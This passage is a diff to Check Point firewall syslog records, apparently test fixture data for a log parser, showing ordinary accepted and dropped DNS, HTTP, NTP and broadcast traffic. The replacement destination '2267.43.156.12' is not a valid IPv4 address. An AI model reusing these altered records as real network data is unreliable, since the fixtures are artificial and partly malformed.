FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51466"; service:"443"; service_id:"https"; src:"192.168.1.117"] -<134>1 2020-03-29T20:09:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810088,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47275"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T20:09:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810088,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47275"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] <134>1 2020-03-29T20:09:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81008a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T20:09:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e81008a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50561"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T20:09:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e81008a,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585512586"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T20:09:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e81008a,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585512586"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T20:09:52Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810092,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; 
service_id:"bootp"; src:"0.0.0.0"] -<134>1 2020-03-29T20:09:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810092,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585512594"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46959"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T20:09:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810092,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585512594"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46959"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T20:09:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810092,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"62180"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T20:09:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810092,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"63328"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T20:09:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810092,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; 
s_port:"48786"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10389"; xlatesrc:"0.0.0.0"] 
@@ -4817,7 +4817,7 @@ <134>1 2020-03-29T20:09:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810092,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55482"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10392"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T20:09:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810092,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35228"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T20:09:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810092,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35403"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10393"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T20:09:56Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810094,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585512596"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37130"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T20:09:56Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810094,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585512596"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; 
parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37130"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T20:09:56Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810094,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38557"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T20:09:56Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810094,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41637"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T20:09:56Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810094,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48800"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10394"; xlatesrc:"0.0.0.0"] 
@@ -4985,10 +4985,10 @@ <134>1 2020-03-29T20:17:56Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810274,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"137"; service:"137"; service_id:"nbname"; src:"192.168.1.1"] <134>1 2020-03-29T20:17:56Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810274,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"] <134>1 2020-03-29T20:17:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810275,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T20:18:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810278,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"2"; service_id:"igmp"; src:"192.168.1.1"] -<134>1 2020-03-29T20:18:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810279,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"] +<134>1 2020-03-29T20:18:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; 
flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810278,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"2"; service_id:"igmp"; src:"192.168.1.1"] +<134>1 2020-03-29T20:18:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810279,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"] <134>1 2020-03-29T20:18:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810281,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.117"] -<134>1 2020-03-29T20:18:19Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81028b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"] +<134>1 2020-03-29T20:18:19Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81028b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; 